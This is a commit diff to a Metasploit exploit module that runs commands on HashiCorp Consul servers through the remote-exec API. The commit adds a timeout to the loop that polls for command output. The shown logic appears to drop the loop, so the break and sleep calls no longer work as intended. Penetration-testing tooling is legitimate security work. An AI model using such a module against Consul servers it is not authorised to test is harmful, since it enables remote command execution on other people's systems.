Implement execution checks with a timeout limit so we don't leave zombie checks running in background.

2018-12-20 18:41:00 +01:00 · 2018-12-20 18:41:00 +01:00 · 2919b970cd
parent ba5c40db77
commit 2919b970cd
1 changed files with 19 additions and 18 deletions
--- a/modules/exploits/multi/misc/consul_rexec_exec.rb
+++ b/modules/exploits/multi/misc/consul_rexec_exec.rb
@ -39,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
@ -123,26 +124,26 @@ class MetasploitModule < Msf::Exploit::Remote
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

-    found = false
-    while not found
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
-        'headers' => {
-          'X-Consul-Token' => datastore['ACL_TOKEN']
-        }
-      })
-      begin
-        data = JSON.parse(res.body)
-        for path in data
-          if path.include? "out"
-            found = true
-          end
+    begin
+      Timeout.timeout(datastore['TIMEOUT']) do
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
+          'headers' => {
+            'X-Consul-Token' => datastore['ACL_TOKEN']
+          }
+        })
+        begin
+          data = JSON.parse(res.body)
+          break if data.include? 'out'
+        rescue JSON::ParseError
+          fail_with(Failure::Unknown, 'Failed to parse JSON output.')
        end
-      rescue JSON::ParseError
-        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+        sleep 2
      end
-      sleep 2
+    rescue Timeout::Error
+      # we catch this error so cleanup still happen afterwards
+      print_status("Timeout hit, error with payload ?")
    end

    print_status("Cleaning up rexec session #{sess['ID']}")